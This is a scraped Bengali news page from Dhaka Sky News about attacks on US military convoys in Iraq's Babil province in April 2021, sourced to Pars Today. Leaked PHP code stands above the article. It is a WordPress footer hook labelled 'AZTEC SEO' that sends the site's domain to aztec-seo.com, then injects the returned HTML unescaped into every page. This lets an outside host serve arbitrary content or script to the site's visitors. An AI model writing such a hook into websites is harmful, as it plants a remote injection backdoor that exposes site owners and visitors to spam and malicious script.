/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইরাকে ২ দিনে ৪ মার্কিন গাড়ি বহরে হামলা | Dhaka Sky News

ওমান সাগর ও পারস্য উপসাগরে নৌমহড়া চালাচ্ছে ইরান ও পাকিস্তান

আগের সংবাদ

তাইওয়ানের ওপর হামলা চালাতে পারে চীন; আমেরিকার সতর্কবার্তা

পরের সংবাদ

ইরাকে ২ দিনে ৪ মার্কিন গাড়ি বহরে হামলা

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: April 7, 2021 , 11:23 pm

ইরাকে মার্কিন সেনাবাহিনীর লজিস্টিক ইকুইপমেন্ট বহনকারী আরও একটি গাড়ি বহরে হামলা হয়েছে। আজ (বুধবার) ইরাকের সংবাদ মাধ্যম ‘আল-আলম আল-মুকাভিম’ জানিয়েছে, বাবিল প্রদেশের আল-নিল জেলায় মার্কিন বাহিনীর লজিস্টিক ইকুইপমেন্ট বহনকারী গাড়ি বহর হামলার শিকার হয়েছে।

এর আগে গতকাল (মঙ্গলবার) বাবিল প্রদেশের আল-হিল্লায় ও জাবালা জেলায় তিনটি মার্কিন গাড়ি বহরে হামলা হয়। তবে এসব হামলায় কী পরিমাণ ক্ষয়ক্ষতি হয়েছে তা জানা যায়নি।

আল-আলম আল-মুকাভিম আরও জানিয়েছে, গতকালের তিনটি হামলার সঙ্গে জড়িত থাকার কথা স্বীকার করেছে ‘কাসিমুল জাব্বারিন’ নামের একটি সংগঠন।

তবে এখন পর্যন্ত এসব হামলার বিষয়ে কোনো প্রতিক্রিয়া দেখায়নি আমেরিকা। ইরাকে অবস্থিত মার্কিন সামরিক ঘাঁটি ও সামরিক বহরে হামলার ঘটনা সম্প্রতি বেড়েছে। ইরাকের জনগণ ও রাজনৈতিক দলগুলো সেদেশে মার্কিন সেনা উপস্থিতির বিরোধিতা করছে। তারা সেদেশ থেকে অবিলম্বে মার্কিন সেনা প্রত্যাহার চায়।

এর আগে ইরাকের সংসদ মার্কিন সেনা বহিষ্কারের বিষয়ে একটি বিল অনুমোদন করেছে। ইরাকের সাবেক প্রধানমন্ত্রী ও রাজনীতিবিদ নুরি আল মালিকি কিছু দিনি আগে ঘোষণা করেছেন, সেদেশে বিদেশি সেনাদের কোনো প্রয়োজন নেই। ইরাকে তৎপর জঙ্গিগোষ্ঠীগুলোর প্রতি মার্কিন বাহিনী সমর্থন ও সহযোগিতা দিয়ে থাকে বলে অভিযোগ রয়েছে। সূত্র : পার্সটুডে